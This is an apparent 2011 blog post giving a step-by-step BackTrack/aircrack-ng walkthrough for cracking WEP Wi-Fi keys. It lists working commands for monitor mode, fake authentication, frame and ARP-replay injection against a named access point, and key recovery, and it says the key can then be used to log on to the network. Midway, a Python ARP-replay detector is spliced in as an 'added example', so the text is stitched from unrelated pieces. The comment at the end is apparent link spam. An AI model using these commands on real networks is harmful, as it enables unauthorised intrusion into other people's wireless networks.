September 16, 2011

Crack WEP

Hardware selection
aircrack-ng.org/doku.php?id=compatibility_drivers

madwifi-project.org/wiki/Compatibility

Install BackTrack Linux
backtrack-linux.org

Test hardware
List interfaces
airmon-ng

Enable monitor mode
airmon-ng start wlan0

Test injection
aireplay-ng --test mon0

Associate with the AP
Find target AP
airodump-ng mon0

Start capture
airodump-ng -c 11 --bssid 30:46:9A:A3:7C:06 -w GOBIN mon0

Fake authentication with AP
aireplay-ng --fakeauth 0 -a 30:46:9A:A3:7C:06 mon0

Interactive frame selection attack
aireplay-ng --interactive -p 0841 -c FF:FF:FF:FF:FF:FF -a 30:46:9A:A3:7C:06 mon0

WEP-encrypted ARP request packets are typically either 68 bytes (from a wireless client) or 86 bytes (from a wired client).

Standard ARP-request replay attack
Use this attack only if there is an active client.

aireplay-ng --arpreplay -b 30:46:9A:A3:7C:06 mon0
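
Seen from the monitoring side, an ARP-request replay re-sends one captured frame unchanged, so the same transmitter/IV pair repeats at one of the sizes noted above. The sketch below is an added example, not part of the original post. The frame tuple layout, window, threshold and sample MAC addresses are assumptions.

```python
from collections import Counter

BROADCAST = "FF:FF:FF:FF:FF:FF"
ARP_SIZES = {68, 86}  # WEP-encrypted ARP request sizes quoted in the post

def find_arp_replay(frames, window=1.0, threshold=20):
    """Return {(src_mac, iv): peak_count} for suspected replayed ARP requests.

    frames: (timestamp_s, src_mac, dst_mac, length, iv_hex) tuples sorted by
    time (assumed layout). A replayed frame is re-sent unchanged, so one
    transmitter/IV pair repeats many times inside a short window.
    """
    candidates = [f for f in frames
                  if f[3] in ARP_SIZES and f[2].upper() == BROADCAST]
    counts, alerts, start = Counter(), {}, 0
    for ts, src, _dst, _length, iv in candidates:
        counts[(src, iv)] += 1
        # Expire frames that have fallen out of the sliding window.
        while ts - candidates[start][0] > window:
            old = candidates[start]
            counts[(old[1], old[4])] -= 1
            start += 1
        if counts[(src, iv)] >= threshold:
            alerts[(src, iv)] = max(alerts.get((src, iv), 0), counts[(src, iv)])
    return alerts

def constructed_capture():
    """Constructed sample frames (not real traffic)."""
    client, injector = "00:11:22:33:44:55", "66:77:88:99:AA:BB"
    # Ordinary client: occasional ARP requests, a fresh IV on every frame.
    frames = [(i * 0.25, client, BROADCAST, 68, f"{i:06x}") for i in range(8)]
    # Replay burst: the same 68-byte frame and IV, 100 times in half a second.
    frames += [(2.0 + i * 0.005, injector, BROADCAST, 68, "a1b2c3")
               for i in range(100)]
    # Unrelated full-size data frame; ignored by the size/destination filter.
    frames.append((2.1, client, "30:46:9A:A3:7C:06", 1500, "00ffee"))
    return sorted(frames)

if __name__ == "__main__":
    for (src, iv), n in find_arp_replay(constructed_capture()).items():
        print(f"possible ARP replay: {src} reused IV {iv} {n}x within 1 s")
```
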

Crack
aircrack-ng GOBIN-01.cap

It usually takes 10000-34000 IVs to find the key. The WEP key appears next to "KEY FOUND" in the output. Drop the colons and enter it to log on to the network.

Links

aircrack-ng.org/doku.php?id=i_am_injecting_but_the_ivs_don_t_increase
backtrack-linux.org/forums/backtrack-5-beginners-section/40837-injection-working-but-no-data-increase.html
backtrack-linux.org/forums/backtrack-5-beginners-section/41824-cant-get-arp-request-0-pps-packet-sent.html
lifehacker.com/5305094/how-to-crack-a-wi+fi-networks-wep-password-with-backtrack

1 comment:

  1. Here I have shared my sample:- http://bit.ly/1Nbfgm6
    Sometimes it is difficult to manage airodump-ng output files. I mean, once I generate those CSV and XML files and start looking into them, for a large amount of data I can't figure it out. So are there any tools or services available for analysis and visualization? I have used this website and it is quite good; here I have shared my sample data, have a look, and also share any other sources if anyone knows. - http://bit.ly/1Nbfgm6
